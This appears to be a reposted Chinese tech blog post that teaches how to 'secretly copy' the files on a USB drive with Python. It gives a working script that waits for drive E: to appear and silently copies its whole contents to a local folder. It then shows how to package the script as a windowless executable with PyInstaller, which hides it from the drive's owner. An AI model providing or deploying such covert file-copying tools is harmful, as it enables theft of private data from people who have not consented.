用几行python代码偷偷复制U盘文件
马哥Linux运维
共 2210字,需浏览 5分钟
·
2021-05-19 06:56
前言
代码
# -*- coding:utf-8 -*-
import os
import time
from datetime import datetime
import shutil
# U盘的盘符
usb_path = "E:/"
# 要复制到的路径
save_path = "D:/haha"
while (True):
if os.path.exists(usb_path):
shutil.copytree(usb_path, os.path.join(save_path, datetime.now().strftime("%Y%m%d_%H%M%S")))
break
else:
time.sleep(10)
usb_path就是U盘的盘符,比如你的电脑有C,D盘,那么U盘插上来以后路径就是E盘 save_path就是你要把复制的文件保存在哪里
Python文件打包成exe
pip install pyinstaller
mhammond/pywin32
[pywin32-223.win32-py3.6.exe]
Python 3.6.3 ... [MSC v.1900 32 bit (Intel)] on win32
[pywin32-223.win-amd64-py3.6.exe]
Python 3.6.3 ... [MSC v.1900 64 bit (AMD64)] on win32
pyinstaller [opts] yourprogram.py
实例说明
test.py
,绝对路径在[D:\project]
,打包成一个exe格式的文件pyinstaller -F D:\project\test.py
pyinstaller -F -w D:\project\test.py
pyinstaller -F -w -i D:\project\test.ico D:\project\test.py
运行程序
文章转载:Python
(版权归原作者所有,侵删)
点击下方“阅读原文”查看更多
评论